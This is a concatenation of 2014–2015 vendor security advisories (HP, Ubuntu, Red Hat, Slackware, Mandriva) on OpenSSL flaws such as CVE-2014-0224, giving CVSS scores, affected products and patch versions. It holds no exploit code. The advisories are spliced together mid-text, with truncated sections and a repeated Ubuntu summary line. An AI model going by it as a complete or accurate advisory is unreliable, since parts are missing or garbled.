- HP StoreVirtual 4330 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 FC 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 China Hybrid SAN Solution 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 China Hybrid Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 Hybrid SAN Solution 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 Hybrid Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 2TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 3TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 3TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 450GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 4TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 600GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4630 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 600GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2010-5298
4.8 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L
4.0 (AV:N/AC:H/Au:N/C:N/I:P/A:P)
CVE-2014-0076
4.0 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1.9 (AV:L/AC:M/Au:N/C:P/I:N/A:N)
CVE-2014-0195
7.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVE-2014-0198
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CVE-2014-0221
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CVE-2014-0224
6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVE-2014-3470
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CVE-2014-3566
3.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N
4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CVE-2016-0705
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE recommends applying the following software updates to resolve the vulnerabilities in the impacted versions of HPE StoreVirtual products running HPE LeftHand OS.
LeftHand OS v11.5 - Patches 45019-00 and 45020 LeftHand OS v12.0 - Patches 50016-00 and 50017-00 LeftHand OS v12.5 - Patch 55016-00 LeftHand OS v12.6 - Patch 56002-00
Notes:
These patches enable TLSv1.2 protocol and upgrades the OpenSSL RPM revision to OpenSSL v1.0.1e 48. These patches migrate Certificate Authority Hashing Algorithm from a weak hashing algorithm SHA1 to the stronger hashing algorithm SHA256. ============================================================================ Ubuntu Security Notice USN-2232-1 June 05, 2014
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 13.10
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenSSL. This issue only affected Ubuntu 12.04 LTS, Ubuntu 13.10, and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS, Ubuntu 13.10, and Ubuntu 14.04 LTS. (CVE-2014-3470)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.2
Ubuntu 13.10: libssl1.0.0 1.0.1e-3ubuntu1.4
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.14
Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.18
After a standard system update you need to reboot your computer to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: openssl security update Advisory ID: RHSA-2014:0679-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0679.html Issue date: 2014-06-10 CVE Names: CVE-2010-5298 CVE-2014-0195 CVE-2014-0198 CVE-2014-0221 CVE-2014-0224 CVE-2014-3470 =====================================================================
- Summary:
Updated openssl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 7.
The Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.
It was found that OpenSSL clients and servers could be forced, via a specially crafted handshake packet, to use weak keying material for communication. A man-in-the-middle attacker could use this flaw to decrypt and modify traffic between a client and a server. (CVE-2014-0224)
Note: In order to exploit this flaw, both the server and the client must be using a vulnerable version of OpenSSL; the server must be using OpenSSL version 1.0.1 and above, and the client must be using any version of OpenSSL. For more information about this flaw, refer to: https://access.redhat.com/site/articles/904433
A buffer overflow flaw was found in the way OpenSSL handled invalid DTLS packet fragments. A remote attacker could possibly use this flaw to execute arbitrary code on a DTLS client or server. (CVE-2014-0195)
Multiple flaws were found in the way OpenSSL handled read and write buffers when the SSL_MODE_RELEASE_BUFFERS mode was enabled. A TLS/SSL client or server using OpenSSL could crash or unexpectedly drop connections when processing certain SSL traffic. (CVE-2010-5298, CVE-2014-0198)
A denial of service flaw was found in the way OpenSSL handled certain DTLS ServerHello requests. (CVE-2014-0221)
A NULL pointer dereference flaw was found in the way OpenSSL performed anonymous Elliptic Curve Diffie Hellman (ECDH) key exchange. A specially crafted handshake packet could cause a TLS/SSL client that has the anonymous ECDH cipher suite enabled to crash. (CVE-2014-3470)
Red Hat would like to thank the OpenSSL project for reporting these issues. Upstream acknowledges KIKUCHI Masashi of Lepidum as the original reporter of CVE-2014-0224, Jüri Aedla as the original reporter of CVE-2014-0195, Imre Rad of Search-Lab as the original reporter of CVE-2014-0221, and Felix Gröbert and Ivan Fratrić of Google as the original reporters of CVE-2014-3470.
All OpenSSL users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1087195 - CVE-2010-5298 openssl: freelist misuse causing a possible use-after-free 1093837 - CVE-2014-0198 openssl: SSL_MODE_RELEASE_BUFFERS NULL pointer dereference in do_ssl3_write() 1103586 - CVE-2014-0224 openssl: SSL/TLS MITM vulnerability 1103593 - CVE-2014-0221 openssl: DoS when sending invalid DTLS handshake 1103598 - CVE-2014-0195 openssl: Buffer overflow via DTLS invalid fragment 1103600 - CVE-2014-3470 openssl: client-side denial of service when using anonymous ECDH
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-34.el7_0.3.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.3.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.3.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.3.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.3.i686.rpm openssl-libs-1.0.1e-34.el7_0.3.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.3.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.3.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.3.i686.rpm openssl-devel-1.0.1e-34.el7_0.3.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.3.x86_64.rpm openssl-static-1.0.1e-34.el7_0.3.i686.rpm openssl-static-1.0.1e-34.el7_0.3.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-34.el7_0.3.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.3.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.3.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.3.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.3.i686.rpm openssl-libs-1.0.1e-34.el7_0.3.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.3.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.3.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.3.i686.rpm openssl-devel-1.0.1e-34.el7_0.3.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.3.x86_64.rpm openssl-static-1.0.1e-34.el7_0.3.i686.rpm openssl-static-1.0.1e-34.el7_0.3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-34.el7_0.3.src.rpm
ppc64: openssl-1.0.1e-34.el7_0.3.ppc64.rpm openssl-debuginfo-1.0.1e-34.el7_0.3.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.3.ppc64.rpm openssl-devel-1.0.1e-34.el7_0.3.ppc.rpm openssl-devel-1.0.1e-34.el7_0.3.ppc64.rpm openssl-libs-1.0.1e-34.el7_0.3.ppc.rpm openssl-libs-1.0.1e-34.el7_0.3.ppc64.rpm
s390x: openssl-1.0.1e-34.el7_0.3.s390x.rpm openssl-debuginfo-1.0.1e-34.el7_0.3.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.3.s390x.rpm openssl-devel-1.0.1e-34.el7_0.3.s390.rpm openssl-devel-1.0.1e-34.el7_0.3.s390x.rpm openssl-libs-1.0.1e-34.el7_0.3.s390.rpm openssl-libs-1.0.1e-34.el7_0.3.s390x.rpm
x86_64: openssl-1.0.1e-34.el7_0.3.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.3.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.3.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.3.i686.rpm openssl-devel-1.0.1e-34.el7_0.3.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.3.i686.rpm openssl-libs-1.0.1e-34.el7_0.3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.1e-34.el7_0.3.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.3.ppc64.rpm openssl-perl-1.0.1e-34.el7_0.3.ppc64.rpm openssl-static-1.0.1e-34.el7_0.3.ppc.rpm openssl-static-1.0.1e-34.el7_0.3.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-34.el7_0.3.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.3.s390x.rpm openssl-perl-1.0.1e-34.el7_0.3.s390x.rpm openssl-static-1.0.1e-34.el7_0.3.s390.rpm openssl-static-1.0.1e-34.el7_0.3.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.3.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.3.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.3.x86_64.rpm openssl-static-1.0.1e-34.el7_0.3.i686.rpm openssl-static-1.0.1e-34.el7_0.3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-34.el7_0.3.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.3.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.3.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.3.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.3.i686.rpm openssl-devel-1.0.1e-34.el7_0.3.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.3.i686.rpm openssl-libs-1.0.1e-34.el7_0.3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.3.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.3.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.3.x86_64.rpm openssl-static-1.0.1e-34.el7_0.3.i686.rpm openssl-static-1.0.1e-34.el7_0.3.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2010-5298.html https://www.redhat.com/security/data/cve/CVE-2014-0195.html https://www.redhat.com/security/data/cve/CVE-2014-0198.html https://www.redhat.com/security/data/cve/CVE-2014-0221.html https://www.redhat.com/security/data/cve/CVE-2014-0224.html https://www.redhat.com/security/data/cve/CVE-2014-3470.html https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/site/articles/904433 https://access.redhat.com/site/solutions/905793
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFTl161XlSAg2UNWIIRAiJlAKCiztPWPTBaVbDSJK/cEtvknFYpTACgur3t GHJznx5GNeKZ00848jTZ9hw= =48eV -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. Description:
Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.
This release serves as a replacement for Red Hat JBoss Web Server 2.0.1, and includes several bug fixes. Refer to the Red Hat JBoss Web Server 2.1.0 Release Notes, linked to in the References section, for information on the most significant of these changes.
The following security issues are also fixed with this release:
A race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the "apache" user. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely. (CVE-2014-0231)
It was found that several application-provided XML files, such as web.xml, content.xml, .tld, .tagx, and *.jspx, resolved external entities, permitting XML External Entity (XXE) attacks. An attacker able to deploy malicious applications to Tomcat could use this flaw to circumvent security restrictions set by the JSM, and gain access to sensitive information on the system. Note that this flaw only affected deployments in which Tomcat is running applications from untrusted sources, such as in a shared hosting environment. (CVE-2013-4590)
It was found that, in certain circumstances, it was possible for a malicious web application to replace the XML parsers used by Tomcat to process XSLTs for the default servlet, JSP documents, tag library descriptors (TLDs), and tag plug-in configuration files. The injected XML parser(s) could then bypass the limits imposed on XML external entities and/or gain access to the XML files processed for other web applications deployed on the same Tomcat instance. Solution:
The References section of this erratum contains a download link (you must log in to download the update). 5 client) - i386, x86_64
It was discovered that the OBJ_obj2txt() function could fail to properly NUL-terminate its output. This could possibly cause an application using OpenSSL functions to format fields of X.509 certificates to disclose portions of its memory.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1h-i486-1_slack14.1.txz: Upgraded. +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8za-i486-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8za-i486-1_slack13.0.txz
Updated packages for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8za-x86_64-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8za-x86_64-1_slack13.0.txz
Updated packages for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8za-i486-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8za-i486-1_slack13.1.txz
Updated packages for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8za-x86_64-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8za-x86_64-1_slack13.1.txz
Updated packages for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8za-i486-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8za-i486-1_slack13.37.txz
Updated packages for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8za-x86_64-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8za-x86_64-1_slack13.37.txz
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1h-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1h-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1h-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1h-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1h-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1h-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1h-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1h-x86_64-1_slack14.1.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1h-i486-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1h-i486-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1h-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1h-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 packages: 634b8ecc8abc6d3f249b73d0fefa5959 openssl-0.9.8za-i486-1_slack13.0.txz a2529f1243d42a3608f61b96236b5f60 openssl-solibs-0.9.8za-i486-1_slack13.0.txz
Slackware x86_64 13.0 packages: 2ddac651c5f2531f3a7f70d9f5823bd6 openssl-0.9.8za-x86_64-1_slack13.0.txz d7ffeb15713a587f642fbb3d5c310c75 openssl-solibs-0.9.8za-x86_64-1_slack13.0.txz
Slackware 13.1 packages: 0b84a6a1edf76cba83d4c52c54196baa openssl-0.9.8za-i486-1_slack13.1.txz dfd5d241b0e1703ae9d70d6ccda06179 openssl-solibs-0.9.8za-i486-1_slack13.1.txz
Slackware x86_64 13.1 packages: bd749622577a5f76a59d90b95aa922fd openssl-0.9.8za-x86_64-1_slack13.1.txz 35cf911dd9f0cc13f7f0056d9e1f4520 openssl-solibs-0.9.8za-x86_64-1_slack13.1.txz
Slackware 13.37 packages: 8f674defac9002c81265d284b1072f75 openssl-0.9.8za-i486-1_slack13.37.txz 48ce79e7714cb0c823d2b6ea4a88ba51 openssl-solibs-0.9.8za-i486-1_slack13.37.txz
Slackware x86_64 13.37 packages: efa09162c22782c15806bca99472c5be openssl-0.9.8za-x86_64-1_slack13.37.txz 8e3b8d1e3d3a740bd274fbe38dc10f96 openssl-solibs-0.9.8za-x86_64-1_slack13.37.txz
Slackware 14.0 packages: 8e2698d19f54c7e0cac8f998df23b782 openssl-1.0.1h-i486-1_slack14.0.txz cf6233bc169cf6dd192bb7210f779fc1 openssl-solibs-1.0.1h-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: 2b4f0610d5e46fa7bb27a0b39f0d6d33 openssl-1.0.1h-x86_64-1_slack14.0.txz 18fdd83dcf86204275508a689a017dea openssl-solibs-1.0.1h-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 49aea7da42eef41da894f29762971863 openssl-1.0.1h-i486-1_slack14.1.txz 6f19f4fdc3f018b4e821c519d7bb1e5c openssl-solibs-1.0.1h-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: ccf5ff2b107c665a4f3bf98176937749 openssl-1.0.1h-x86_64-1_slack14.1.txz ea1aaba38c98b096186ca94ca541a793 openssl-solibs-1.0.1h-x86_64-1_slack14.1.txz
Slackware -current packages: db1ed7ded71ab503f567940fff39eb16 a/openssl-solibs-1.0.1h-i486-1.txz 0db4f91f9b568b2b2629950e5ab88b22 n/openssl-1.0.1h-i486-1.txz
Slackware x86_64 -current packages: d01aef33335bee27f36574241f54091f a/openssl-solibs-1.0.1h-x86_64-1.txz 95a743d21c58f39573845d6ec5270656 n/openssl-1.0.1h-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.1h-i486-1_slack14.1.txz openssl-solibs-1.0.1h-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address.
HP Systems Insight Manager v7.3 Hotfix kit HP Systems Insight Manager v7.2 Hotfix kit (The HP Systems Insight Manager v7.2 Hotfix kit is currently unavailable, but will be released at a later date.
http://h18013.www1.hp.com/products/servers/management/hpsim/download.html
NOTE: No reboot of the system is required after applying the HP SIM Hotfix kit. HP System Management Homepage versions 7.3.2 and earlier for Linux and Windows. HP System Management Homepage v7.2.4.1 is available for Windows 2003 only.
HP System Management Homepage v7.2.4.1 for Windows x86: http://www.hp.com/swpublishing/MTX-d775367b0a28449ca05660778b ftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p11160892/v98702
HP System Management Homepage v7.2.4.1 for Windows x64: http://www.hp.com/swpublishing/MTX-3a7aa5e233904ebe847a5e1555 ftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p221526337/v98704
HP System Management Homepage v7.3.3.1 for Windows x86: http://www.hp.com/swpublishing/MTX-3395d737d98f42149125b9bb05 ftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p11160892/v98696
HP System Management Homepage v7.3.3.1 for Windows x64: http://www.hp.com/swpublishing/MTX-e8076c2a35804685ad65b2b1ba ftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p221526337/v98698
HP System Management Homepage v7.3.3.1 for Linux x86: http://www.hp.com/swpublishing/MTX-511c3e0b2f6f4f6bbc796fc619 ftp://ftp.hp.com/pub/softlib2/software1/pubsw-linux/p1980463820/v98694
HP System Management Homepage v7.3.3.1 for Linux x64: http://www.hp.com/swpublishing/MTX-bd9a1cf60e344c549c4888db93 ftp://ftp.hp.com/pub/softlib2/software1/pubsw-linux/p1507410135/v98693
NOTE: HP System Management Homepage v7.3.3.1 for Linux x86 still contains OpenSSL v1.0.0d. As long as all other products which SMH V7.3.3.1 for Linux x86 communicates with have been upgraded to the latest versions, it will not be vulnerable to the exploits described in CVE-2014-0224.
Release Date: 2014-07-09 Last Updated: 2014-07-09
Potential Security Impact: Remote denial of service (DoS), code execution, unauthorized access, disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Software Operation Orchestration. The vulnerabilities could be exploited to allow remote code execution, denial of service (DoS) and disclosure of information. OpenSSL is a 3rd party product that is embedded with some HP Software products. This bulletin notifies HP Software customers about products affected by the OpenSSL vulnerabilities
References:
CVE-2014-0195 Remote Unauthorized Access CVE-2014-0221 Remote Unauthorized Access or Disclosure of Information CVE-2014-3470 Remote Code Execution or Unauthorized Access SSRT101635
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Software Operation Orchestration, v9.X
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-0195 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-0221 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-3470 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following guideline for HP Operations Orchestration to resolve these vulnerabilities.
Guidelines and Patches can be downloaded from HP Software Support Online: http://support.openview.hp.com/selfsolve/document/LID/OO_00030
Bulletin Applicability: This security bulletin applies to each OpenSSL component that is embedded within the HP products listed in the security bulletin. The bulletin does not apply to any other 3rd party application (e.g. operating system, web server, or application server) that may be required to be installed by the customer according instructions in the product install guide.
HISTORY Version:1 (rev.1) - 9 July 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Mandriva Linux Security Advisory MDVSA-2015:062 http://www.mandriva.com/en/support/security/
Package : openssl Date : March 27, 2015 Affected: Business Server 2.0
Problem Description:
Multiple vulnerabilities has been discovered and corrected in openssl:
Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment (CVE-2010-5298).
The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-time behavior, which makes it easier for local users to obtain ECDSA nonces via a FLUSH+RELOAD cache side-channel attack (CVE-2014-0076).
